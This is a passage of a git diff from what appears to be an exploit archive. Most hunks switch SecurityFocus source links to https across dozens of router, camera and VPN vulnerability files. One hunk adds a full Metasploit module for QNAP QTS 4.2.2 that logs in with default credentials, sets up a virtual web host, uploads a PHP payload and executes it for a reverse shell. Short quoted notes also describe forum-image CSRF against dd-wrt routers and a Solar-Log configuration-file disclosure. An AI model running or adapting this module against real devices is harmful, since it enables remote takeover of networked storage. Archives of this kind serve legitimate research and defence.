fails to sanitize user-supplied input. diff --git a/exploits/hardware/remote/37141.txt b/exploits/hardware/remote/37141.txt index 5b7a7fb8a..2dddf4fe8 100644 --- a/exploits/hardware/remote/37141.txt +++ b/exploits/hardware/remote/37141.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/53427/info +source: https://www.securityfocus.com/bid/53427/info The Linksys WRT54GL router is prone to a cross-site request-forgery vulnerability. diff --git a/exploits/hardware/remote/37405.py b/exploits/hardware/remote/37405.py index 3df416743..d90284b15 100755 --- a/exploits/hardware/remote/37405.py +++ b/exploits/hardware/remote/37405.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/54006/info +source: https://www.securityfocus.com/bid/54006/info Edimax IC-3030iWn is prone to an information-disclosure vulnerability. 
diff --git a/exploits/hardware/remote/37429.txt b/exploits/hardware/remote/37429.txt index 5a8f70d2d..251f620a7 100644 --- a/exploits/hardware/remote/37429.txt +++ b/exploits/hardware/remote/37429.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/54075/info +source: https://www.securityfocus.com/bid/54075/info Mobility System Software is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. diff --git a/exploits/hardware/remote/37512.txt b/exploits/hardware/remote/37512.txt index 2a22dfecf..94e1ccae0 100644 --- a/exploits/hardware/remote/37512.txt +++ b/exploits/hardware/remote/37512.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/54593/info +source: https://www.securityfocus.com/bid/54593/info Barracuda SSL VPN 680 is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/37513.txt b/exploits/hardware/remote/37513.txt index 87d6b680d..08576be1c 100644 --- a/exploits/hardware/remote/37513.txt +++ b/exploits/hardware/remote/37513.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/54593/info +source: https://www.securityfocus.com/bid/54593/info Barracuda SSL VPN 680 is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/37564.txt b/exploits/hardware/remote/37564.txt index 3e976f251..b59b03bab 100644 --- a/exploits/hardware/remote/37564.txt +++ b/exploits/hardware/remote/37564.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/54773/info +source: https://www.securityfocus.com/bid/54773/info Barracuda Email Security Service is prone to multiple HTML-injection vulnerabilities because it fails to properly validate user-supplied input. diff --git a/exploits/hardware/remote/37803.txt b/exploits/hardware/remote/37803.txt index 3ca85bb63..9b2cde92d 100644 
--- a/exploits/hardware/remote/37803.txt +++ b/exploits/hardware/remote/37803.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/55570/info +source: https://www.securityfocus.com/bid/55570/info CoSoSys Endpoint Protector is prone to an insecure password generation vulnerability. diff --git a/exploits/hardware/remote/37969.txt b/exploits/hardware/remote/37969.txt index cde1670a4..311c271aa 100644 --- a/exploits/hardware/remote/37969.txt +++ b/exploits/hardware/remote/37969.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/56156/info +source: https://www.securityfocus.com/bid/56156/info FirePass SSL VPN is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/38020.py b/exploits/hardware/remote/38020.py index fccb22449..18f6e6507 100755 --- a/exploits/hardware/remote/38020.py +++ b/exploits/hardware/remote/38020.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/56510/info +source: https://www.securityfocus.com/bid/56510/info Multiple Huawei products are prone to a weak password encryption weakness. diff --git a/exploits/hardware/remote/38100.txt b/exploits/hardware/remote/38100.txt index 51c332044..00b86accb 100644 --- a/exploits/hardware/remote/38100.txt +++ b/exploits/hardware/remote/38100.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/56774/info +source: https://www.securityfocus.com/bid/56774/info Multiple Fortinet FortiWeb Appliances are prone to multiple cross-site scripting vulnerabilities because they fail to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/38164.py b/exploits/hardware/remote/38164.py index e4a9ad405..91273bf43 100755 --- a/exploits/hardware/remote/38164.py +++ b/exploits/hardware/remote/38164.py 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/57128/info +source: https://www.securityfocus.com/bid/57128/info Belkin Wireless Router is prone to a security vulnerability that may allow attackers to generate a default WPS PIN. diff --git a/exploits/hardware/remote/38233.txt b/exploits/hardware/remote/38233.txt index 47ac584e1..e0fabe813 100644 --- a/exploits/hardware/remote/38233.txt +++ b/exploits/hardware/remote/38233.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/57496/info +source: https://www.securityfocus.com/bid/57496/info F5 Networks BIG-IP is prone to an XML External Entity injection vulnerability. diff --git a/exploits/hardware/remote/38308.txt b/exploits/hardware/remote/38308.txt index 190d232d3..c3a7aa121 100644 --- a/exploits/hardware/remote/38308.txt +++ b/exploits/hardware/remote/38308.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/57877/info +source: https://www.securityfocus.com/bid/57877/info TP-LINK TL-WR2543ND is prone to multiple cross-site request-forgery vulnerabilities because the application fails to properly validate HTTP requests. diff --git a/exploits/hardware/remote/38356.txt b/exploits/hardware/remote/38356.txt index 4ca0ded07..0c8bdf97d 100644 --- a/exploits/hardware/remote/38356.txt +++ b/exploits/hardware/remote/38356.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/58290/info +source: https://www.securityfocus.com/bid/58290/info Foscam is prone to a directory-traversal vulnerability. diff --git a/exploits/hardware/remote/38389.txt b/exploits/hardware/remote/38389.txt index c4b939fde..f3bf9537a 100644 --- a/exploits/hardware/remote/38389.txt +++ b/exploits/hardware/remote/38389.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/58476/info +source: https://www.securityfocus.com/bid/58476/info Cisco Video Surveillance Operations Manager is prone to multiple security vulnerabilities, including: 
diff --git a/exploits/hardware/remote/38437.txt b/exploits/hardware/remote/38437.txt index 65aec2537..a702a76e9 100644 --- a/exploits/hardware/remote/38437.txt +++ b/exploits/hardware/remote/38437.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/58943/info +source: https://www.securityfocus.com/bid/58943/info Multiple Foscam IP Cameras are prone to multiple cross-site request-forgery vulnerabilities. diff --git a/exploits/hardware/remote/38464.txt b/exploits/hardware/remote/38464.txt index 4d68d03ee..4de329e01 100644 --- a/exploits/hardware/remote/38464.txt +++ b/exploits/hardware/remote/38464.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/59054/info +source: https://www.securityfocus.com/bid/59054/info Cisco Linksys EA2700 routers is prone to the following security vulnerabilities: diff --git a/exploits/hardware/remote/38481.html b/exploits/hardware/remote/38481.html index c22af372c..af47372ce 100644 --- a/exploits/hardware/remote/38481.html +++ b/exploits/hardware/remote/38481.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/59312/info +source: https://www.securityfocus.com/bid/59312/info D-Link DIR-865L is prone to a cross-site request-forgery vulnerability. diff --git a/exploits/hardware/remote/38492.html b/exploits/hardware/remote/38492.html index aa6b8f5a0..933aa442a 100644 --- a/exploits/hardware/remote/38492.html +++ b/exploits/hardware/remote/38492.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/59442/info +source: https://www.securityfocus.com/bid/59442/info The TP-Link TL-WR1043N Router is prone to a cross-site request-forgery vulnerability. diff --git a/exploits/hardware/remote/38495.html b/exploits/hardware/remote/38495.html index 0508354ad..ef4d7e6f7 100644 --- a/exploits/hardware/remote/38495.html +++ b/exploits/hardware/remote/38495.html 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/59476/info +source: https://www.securityfocus.com/bid/59476/info Belkin F5D8236-4 Router is prone to a cross-site request-forgery vulnerability. diff --git a/exploits/hardware/remote/38501.txt b/exploits/hardware/remote/38501.txt index 1c8685efb..bfba07f0b 100644 --- a/exploits/hardware/remote/38501.txt +++ b/exploits/hardware/remote/38501.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/59558/info +source: https://www.securityfocus.com/bid/59558/info The Cisco Linksys E1200 N300 router is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/hardware/remote/38536.txt b/exploits/hardware/remote/38536.txt index 0fb6f6df6..c02535005 100644 --- a/exploits/hardware/remote/38536.txt +++ b/exploits/hardware/remote/38536.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/60172/info +source: https://www.securityfocus.com/bid/60172/info Barracuda SSL VPN 680 is prone to an open-redirection vulnerability. diff --git a/exploits/hardware/remote/38582.html b/exploits/hardware/remote/38582.html index dc50ff532..fb03cb685 100644 --- a/exploits/hardware/remote/38582.html +++ b/exploits/hardware/remote/38582.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/60526/info +source: https://www.securityfocus.com/bid/60526/info Brickcom multiple IP cameras are prone to a cross-site request-forgery vulnerability. diff --git a/exploits/hardware/remote/38583.html b/exploits/hardware/remote/38583.html index 1a9f2b027..1dbc899a4 100644 --- a/exploits/hardware/remote/38583.html +++ b/exploits/hardware/remote/38583.html 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/60529/info +source: https://www.securityfocus.com/bid/60529/info Sony CH and DH series IP cameras including SNCCH140, SNCCH180, SNCCH240, SNCCH280, SNCDH140, SNCDH140T, SNCDH180, SNCDH240, SNCDH240T, and SNCDH280 are prone to multiple cross-site request-forgery vulnerabilities. diff --git a/exploits/hardware/remote/38584.txt b/exploits/hardware/remote/38584.txt index d2c4af3ac..e3d7c482f 100644 --- a/exploits/hardware/remote/38584.txt +++ b/exploits/hardware/remote/38584.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/60532/info +source: https://www.securityfocus.com/bid/60532/info Grandstream multiple IP cameras including GXV3501, GXV3504, GXV3601, GXV3601HD/LL, GXV3611HD/LL, GXV3615W/P, GXV3651FHD, GXV3662HD, GXV3615WP_HD, and GXV3500 are prone to a cross-site request-forgery vulnerability. diff --git a/exploits/hardware/remote/38591.py b/exploits/hardware/remote/38591.py index e6776de97..11d4f2df6 100755 --- a/exploits/hardware/remote/38591.py +++ b/exploits/hardware/remote/38591.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/60682/info +source: https://www.securityfocus.com/bid/60682/info TP-LINK TL-PS110U Print Server is prone to a security-bypass vulnerability. diff --git a/exploits/hardware/remote/38632.txt b/exploits/hardware/remote/38632.txt index bd46d1338..69b03f62f 100644 --- a/exploits/hardware/remote/38632.txt +++ b/exploits/hardware/remote/38632.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/61044/info +source: https://www.securityfocus.com/bid/61044/info Multiple Zoom Telephonics devices are prone to an information-disclosure vulnerability, multiple authentication bypass vulnerabilities and an SQL-injection vulnerability. diff --git a/exploits/hardware/remote/38671.txt b/exploits/hardware/remote/38671.txt index 4c498526c..a5eafd4e0 100644 --- a/exploits/hardware/remote/38671.txt +++ b/exploits/hardware/remote/38671.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/61353/info +source: https://www.securityfocus.com/bid/61353/info Barracuda CudaTel is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/38692.txt b/exploits/hardware/remote/38692.txt index d0b5fb13f..637bea2fa 100644 --- a/exploits/hardware/remote/38692.txt +++ b/exploits/hardware/remote/38692.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/61733/info +source: https://www.securityfocus.com/bid/61733/info AlgoSec Firewall Analyzer is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/38804.py b/exploits/hardware/remote/38804.py index 112e16ca6..ff3685f19 100755 --- a/exploits/hardware/remote/38804.py +++ b/exploits/hardware/remote/38804.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/63168/info +source: https://www.securityfocus.com/bid/63168/info Multiple Level One Enterprise Access Point devices are prone to a security bypass vulnerability. diff --git a/exploits/hardware/remote/38810.py b/exploits/hardware/remote/38810.py index 50cbe6522..b1f0001fd 100755 --- a/exploits/hardware/remote/38810.py +++ b/exploits/hardware/remote/38810.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/63234/info +source: https://www.securityfocus.com/bid/63234/info Multiple Vendors are prone to a stack-based buffer-overflow vulnerability. diff --git a/exploits/hardware/remote/38824.html b/exploits/hardware/remote/38824.html index 9c0a1f600..5a47dea2d 100644 --- a/exploits/hardware/remote/38824.html +++ b/exploits/hardware/remote/38824.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/63663/info +source: https://www.securityfocus.com/bid/63663/info FortiAnalyzer is prone to a cross-site request-forgery vulnerability because it fails to properly validate HTTP requests. 
diff --git a/exploits/hardware/remote/38850.txt b/exploits/hardware/remote/38850.txt index 306ea0f0a..397da9f3d 100644 --- a/exploits/hardware/remote/38850.txt +++ b/exploits/hardware/remote/38850.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/63880/info +source: https://www.securityfocus.com/bid/63880/info Thomson Reuters Velocity Analytics is prone to a vulnerability that lets attackers inject and execute arbitrary code. diff --git a/exploits/hardware/remote/38851.html b/exploits/hardware/remote/38851.html index 9867b6231..cd1110f45 100644 --- a/exploits/hardware/remote/38851.html +++ b/exploits/hardware/remote/38851.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/63908/info +source: https://www.securityfocus.com/bid/63908/info LevelOne WBR-3406TX router is prone to a cross-site request-forgery vulnerability. diff --git a/exploits/hardware/remote/39089.txt b/exploits/hardware/remote/39089.txt index 2150cf3d1..3efab52e1 100644 --- a/exploits/hardware/remote/39089.txt +++ b/exploits/hardware/remote/39089.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/65444/info +source: https://www.securityfocus.com/bid/65444/info The Netgear D6300B router is prone to the following security vulnerabilities: diff --git a/exploits/hardware/remote/39138.html b/exploits/hardware/remote/39138.html index 1fa4ae679..4e972979d 100644 --- a/exploits/hardware/remote/39138.html +++ b/exploits/hardware/remote/39138.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/66593/info +source: https://www.securityfocus.com/bid/66593/info ICOMM 610 is prone to a cross-site request-forgery vulnerability. diff --git a/exploits/hardware/remote/39154.txt b/exploits/hardware/remote/39154.txt index 2748b9dc8..812a27a63 100644 --- a/exploits/hardware/remote/39154.txt +++ b/exploits/hardware/remote/39154.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/67033/info +source: https://www.securityfocus.com/bid/67033/info Comtrend CT-5361T ADSL Router is prone to a cross-site scripting vulnerability and a cross-site request-forgery vulnerability. diff --git a/exploits/hardware/remote/39195.c b/exploits/hardware/remote/39195.c index 5cd00f01d..5a2d525ec 100644 --- a/exploits/hardware/remote/39195.c +++ b/exploits/hardware/remote/39195.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/67510/info +// source: https://www.securityfocus.com/bid/67510/info Foscam IP Camera is prone to a security-bypass vulnerability. diff --git a/exploits/hardware/remote/39209.txt b/exploits/hardware/remote/39209.txt index 42f92b96f..30519df0d 100644 --- a/exploits/hardware/remote/39209.txt +++ b/exploits/hardware/remote/39209.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/67747/info +source: https://www.securityfocus.com/bid/67747/info Huawei E303 Router is prone to a cross-site request-forgery vulnerability. diff --git a/exploits/hardware/remote/39278.txt b/exploits/hardware/remote/39278.txt index 6852b0ee8..b5c18d2e4 100644 --- a/exploits/hardware/remote/39278.txt +++ b/exploits/hardware/remote/39278.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/69028/info +source: https://www.securityfocus.com/bid/69028/info Barracuda Web Application Firewall is prone to an authentication-bypass vulnerability. diff --git a/exploits/hardware/remote/39314.c b/exploits/hardware/remote/39314.c index 904486692..86d659c14 100644 --- a/exploits/hardware/remote/39314.c +++ b/exploits/hardware/remote/39314.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/69808/info +source: https://www.securityfocus.com/bid/69808/info Aztech Modem Routers are prone to an information-disclosure vulnerability. diff --git a/exploits/hardware/remote/39316.pl b/exploits/hardware/remote/39316.pl index f709adddd..10b5747c0 100755 --- a/exploits/hardware/remote/39316.pl 
+++ b/exploits/hardware/remote/39316.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/69811/info +source: https://www.securityfocus.com/bid/69811/info Multiple Aztech Modem Routers are prone to a session-hijacking vulnerability. diff --git a/exploits/hardware/remote/43142.c b/exploits/hardware/remote/43142.c index 15745092c..f1adac689 100644 --- a/exploits/hardware/remote/43142.c +++ b/exploits/hardware/remote/43142.c @@ -1,5 +1,5 @@ -# Exploit-DB Note ~ Source: https://pierrekim.github.io/advisories/expl-goahead-camera.c -# Exploit-DB Note ~ Credit: https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html +// Exploit-DB Note ~ Source: https://pierrekim.github.io/advisories/expl-goahead-camera.c +// Exploit-DB Note ~ Credit: https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html #include #include diff --git a/exploits/hardware/dos/46469.py b/exploits/hardware/remote/46469.py similarity index 100% rename from exploits/hardware/dos/46469.py rename to exploits/hardware/remote/46469.py diff --git a/exploits/hardware/remote/46506.rb b/exploits/hardware/remote/46506.rb new file mode 100755 index 000000000..361b8e401 --- /dev/null +++ b/exploits/hardware/remote/46506.rb 
@@ -0,0 +1,268 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'base64' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize + super( + 'Name' => 'QNAP TS-431 QTS < 4.2.2 - Remote Command Execution', + 'Description' => %q{ + This module creates a virtual web server and uploads the php payload into it. + Admin privileges cannot access any server files except File Station files. + The user who is authorized to create Virtual Web Server can upload malicious php file by activating the server. + Exploit creates a new directory into File Station to connect to the web server. + However, only the "index.php" file is allowed to work in the virtual web server directory. + No files can be executed except "index.php". Gives an access error. + After the harmful "index.php" has been uploaded, the shell can be retrieved from the server. + There is also the possibility of working in higher versions. 
+ }, + 'Author' => [ + 'AkkuS <Özkan Mustafa Akkuş>', # Vulnerability Discovery, PoC & Msf Module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['URL', 'https://pentest.com.tr/exploits/QNAP-QTS-4-2-2-Remote-Command-Execution-Metasploit.html'], + ], + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => + [ + ['QNAP QTS <= 4.2.2', {}] + ], + 'DisclosureDate' => '06 March 2019', + 'Privileged' => false, + 'DefaultTarget' => 0 + ) + + register_options( + [ + OptBool.new('SSL', [true, 'Use SSL', false]), + OptString.new('TARGETURI', [true, 'The base path to QNAP', '/']), + OptString.new('USER', [true, 'User to login with', 'admin']), + OptString.new('PASS', [true, 'Password to login with', 'admin']), + ], self.class) + end +## +# Check Exploit Vulnerable +## + def check + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri, "/cgi-bin/login.html") + }) + + if res and res.code == 200 and res.body =~ /dc=4.2./ + return Exploit::CheckCode::Vulnerable + else + return Exploit::CheckCode::Safe + end + return res + end +## +# Login +## + def exploit + + b64pwd = Base64.encode64("#{datastore['PASS']}") + b64 = b64pwd.split('=').first + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri, "/cgi-bin/authLogin.cgi"), + 'vars_post' => { + "user" => datastore['USER'], + "pwd" => "#{b64}=", + "serviceKey" => "1" + } + }) + + if res and res.code == 200 and res.body =~ /authSid/ + print_good("Login successful") + nasid = res.body.split("authSid> 'POST', + 'cookie' => cookie, + 'uri' => normalize_uri(target_uri, "/cgi-bin/userConfig.cgi"), + 'vars_post' => { + "func" => "updateLoginTime", + "sid" => "#{nasid}" + } + }) + + if res and res.code == 200 and res.body =~ /true/ + print_good("Update Login Time Successful") + else + print_error("Update failed") + end + +## +# Create Folder in File Station for Web Server +## + cmdfile = "cmd#{rand_text_alphanumeric(rand(5) + 5)}" + print_status("Web Folder = 
/#{cmdfile}") + print_status("Attempting to create a folder via File Station.") + res = send_request_cgi({ + 'method' => 'POST', + 'cookie' => cookie, + 'uri' => normalize_uri(target_uri, "/cgi-bin/wizReq.cgi?&wiz_func=share_create&action=add_share"), + 'vars_post' => { + "share_name" => cmdfile, + "comment" => "", + "guest" => "deny", + "hidden" => "0", + "oplocks" => "1", + "EncryptData" => "0", + "wizard_filter" => "", + "user_wizard_filter" => "", + "userw0" => "#{datastore['USER']}", + "userd_len" => "0", + "userw_len" => "1", + "usero_len" => "0", + "access_r" => "setup_users", + "img_file_path" => "", + "path_type" => "auto", + "quotaSettings" => "", + "quota_size" => "", + "recycle_bin" => "1", + "recycle_bin_administrators_only" => "0", + "quotaRadio" => "0", + "vol_no" => "1", + "addToMediaFolder" => "0", + "qsync" => "0", + "sid" => "#{nasid}" + } + }) + + if res and res.code == 200 and res.body =~ /buildTime/ + print_good("File Create Successful") + else + print_error("File Create Failed") + end +## +# Enable Virtual Host +## + print_status("Attempting to Enable Virtual Host") + res = send_request_cgi({ + 'method' => 'POST', + 'cookie' => cookie, + 'uri' => normalize_uri(target_uri, "/cgi-bin/net/networkRequest.cgi?&subfunc=web_srv&apply=1&todo=set_enable"), + 'vars_post' => { + "enable" => "1", + "sid" => "#{nasid}" + } + }) + + if res and res.code == 200 + print_good("Virtual Host Enabled") + else + print_error("Process Failed") + end +## +# Enable Virtual Host +## + print_status("Attempting to Create Virtual Host") + res = send_request_cgi({ + 'method' => 'POST', + 'cookie' => cookie, + 'uri' => normalize_uri(target_uri, "/cgi-bin/net/networkRequest.cgi?&subfunc=web_srv"), + 'vars_post' => { + "apply" => "1", + "share_folder" => "1", + "manual_path" => cmdfile, + "vhost_name" => "cmd", + "vhost_port" => "4443", + "vhost_ssl" => "0", + "todo" => "add_vhost", + "sid" => "#{nasid}" + } + }) + + if res and res.code == 200 + print_good("Virtual Host 
Started on port 4443") + else + print_error("Process Failed") + end +## +# Fetching upload_id information +## + print_status("Attempting to Upload get Upload ID") + res = send_request_cgi({ + 'method' => 'POST', + 'cookie' => cookie, + 'uri' => normalize_uri(target_uri, "/cgi-bin/filemanager/utilRequest.cgi?func=start_chunked_upload"), + 'vars_post' => { + "upload_root_dir" => "/#{cmdfile}", + "sid" => "#{nasid}" + } + }) + + if res and res.code == 200 and res.body =~ /upload_id/ + print_good("Login successful") + uploadid = res.body.split("upload_id")[1].split('"')[2] + print_status("Upload ID = #{uploadid}") + else + print_error("Login failed") + end +## +# Upload Payload +## + boundary = Rex::Text.rand_text_alphanumeric(29) + + data = "-----------------------------{boundary}" + data << "\r\nContent-Disposition: form-data; name=\"fileName\"\r\n\r\n" + data << "msf.php\r\n-----------------------------{boundary}" + data << "\r\nContent-Disposition: form-data; name=\"file\"; filename=\"blob\"\r\n" + data << "Content-Type: application/octet-stream\r\n\r\n" + data << payload.encoded + data << "\r\n-----------------------------{boundary}--\r\n" + + print_status("Attempting to Upload Payload to Reverse Shell") + + res = send_request_raw( + { + 'method' => "POST", + 'uri' => normalize_uri(target_uri, "/cgi-bin/filemanager/utilRequest.cgi?sid=#{nasid}&func=chunked_upload&dest_path=/#{cmdfile}&overwrite=1&upload_root_dir=/#{cmdfile}&upload_id=#{uploadid}&offset=0&filesize=1115&upload_name=index.php&settime=1&mtime=1551868245"), + 'data' => data, + 'headers' => + { + 'Content-Type' => 'multipart/form-data; boundary=---------------------------{boundary}', + }, + 'cookie' => cookie + }) + + if res and res.code == 200 + print_good("Payload Uploaded Successful") + else + print_error("Upload Failed") + end +## +# Execute the Payload +## + print_status("Attempting to execute the payload...") + + res = request_url("http://#{rhost}:4443/index.php") + + if res and res.code == 200 + 
print_good "Payload executed successfully" + end + end +end +## +# End +## \ No newline at end of file diff --git a/exploits/hardware/remote/9209.txt b/exploits/hardware/remote/9209.txt index 9edd4ed4a..dbdca9889 100644 --- a/exploits/hardware/remote/9209.txt +++ b/exploits/hardware/remote/9209.txt @@ -86,7 +86,7 @@ IE even this can be supressed, see this one: http://ha.ckers.org/blog/20090630/csrf-and-ignoring-basicdigest-auth/ Unlike the already documented CSRF vulnerability ( -http://www.securityfocus.com/bid/32703 ) this DOES NOT need an authenticated +https://www.securityfocus.com/bid/32703 ) this DOES NOT need an authenticated session. This means someone can even post some crafted [img] link on a forum and a dd-wrt router owner visiting the forum will get owned :) diff --git a/exploits/hardware/webapps/25139.txt b/exploits/hardware/webapps/25139.txt index 102cdc6d4..761ce17c4 100644 --- a/exploits/hardware/webapps/25139.txt +++ b/exploits/hardware/webapps/25139.txt @@ -426,7 +426,7 @@ CORE-2013-0301 is published as 'user-release'. 10. *References* [1] http://www.vivotek.com/web/product/NetworkCameras.aspx -[2] http://www.securityfocus.com/bid/54476. +[2] https://www.securityfocus.com/bid/54476. [3] Alejandro Leon Morales [Gothicx] http://www.undermx.blogspot.mx. 11. *About CoreLabs* diff --git a/exploits/hardware/webapps/27320.txt b/exploits/hardware/webapps/27320.txt index 33e62226a..bace6ee94 100644 --- a/exploits/hardware/webapps/27320.txt +++ b/exploits/hardware/webapps/27320.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16839/info +source: https://www.securityfocus.com/bid/16839/info The SpeedTouch 500 series are prone to a cross-site scripting vulnerability. This issue is due to a failure in the devices to properly sanitize user-supplied input. diff --git a/exploits/hardware/webapps/28283.txt b/exploits/hardware/webapps/28283.txt index 24aea9997..a424369be 100644 --- a/exploits/hardware/webapps/28283.txt 
+++ b/exploits/hardware/webapps/28283.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19180/info +source: https://www.securityfocus.com/bid/19180/info The Zyxel Prestige 660H-61 ADSL Router is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/webapps/36286.txt b/exploits/hardware/webapps/36286.txt index 7a56ca2d1..00b007363 100644 --- a/exploits/hardware/webapps/36286.txt +++ b/exploits/hardware/webapps/36286.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50520/info +source: https://www.securityfocus.com/bid/50520/info DreamBox DM800 is prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input. diff --git a/exploits/hardware/webapps/36865.txt b/exploits/hardware/webapps/36865.txt index 20073608e..f0787ebcb 100644 --- a/exploits/hardware/webapps/36865.txt +++ b/exploits/hardware/webapps/36865.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52098/info +source: https://www.securityfocus.com/bid/52098/info Xavi 7968 ADSL Router is prone to cross-site scripting, HTML-injection and cross-site request forgery vulnerabilities. diff --git a/exploits/hardware/webapps/37135.txt b/exploits/hardware/webapps/37135.txt index 5b50b2814..71ca59a56 100644 --- a/exploits/hardware/webapps/37135.txt +++ b/exploits/hardware/webapps/37135.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/53355/info +source: https://www.securityfocus.com/bid/53355/info iGuard Security Access Control is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input in the embedded web server. diff --git a/exploits/hardware/webapps/37982.pl b/exploits/hardware/webapps/37982.pl index 23b748c0f..cced854ab 100755 --- a/exploits/hardware/webapps/37982.pl +++ b/exploits/hardware/webapps/37982.pl 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/56320/info +source: https://www.securityfocus.com/bid/56320/info TP-LINK TL-WR841N router is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/hardware/webapps/38604.txt b/exploits/hardware/webapps/38604.txt index 4315395c7..448f40930 100644 --- a/exploits/hardware/webapps/38604.txt +++ b/exploits/hardware/webapps/38604.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/60847/info +source: https://www.securityfocus.com/bid/60847/info Mobile USB Drive HD is prone to multiple local file-include and arbitrary file-upload vulnerabilities because it fails to adequately validate files before uploading them. diff --git a/exploits/hardware/webapps/38853.sh b/exploits/hardware/webapps/38853.sh index f84d3ae18..c687ae1ec 100755 --- a/exploits/hardware/webapps/38853.sh +++ b/exploits/hardware/webapps/38853.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/64043/info +source: https://www.securityfocus.com/bid/64043/info Multiple D-Link DIR series routers are prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input. diff --git a/exploits/hardware/webapps/41671.txt b/exploits/hardware/webapps/41671.txt index 8f25e0fa0..04bff5457 100644 --- a/exploits/hardware/webapps/41671.txt +++ b/exploits/hardware/webapps/41671.txt @@ -184,7 +184,7 @@ http:///PoC.html 4) Information Disclosure (CVE-2001-1341) This vulnerability is a known issue to IPC@CHIP since 2001. -See: http://www.securityfocus.com/bid/2767/info +See: https://www.securityfocus.com/bid/2767/info The following URL can be used to open the "ChipCfg" file on a Solar-Log device: http:///ChipCfg diff --git a/exploits/hp-ux/dos/19278.pl b/exploits/hp-ux/dos/19278.pl index 1e587227a..fae4e15a3 100755 --- a/exploits/hp-ux/dos/19278.pl +++ b/exploits/hp-ux/dos/19278.pl 
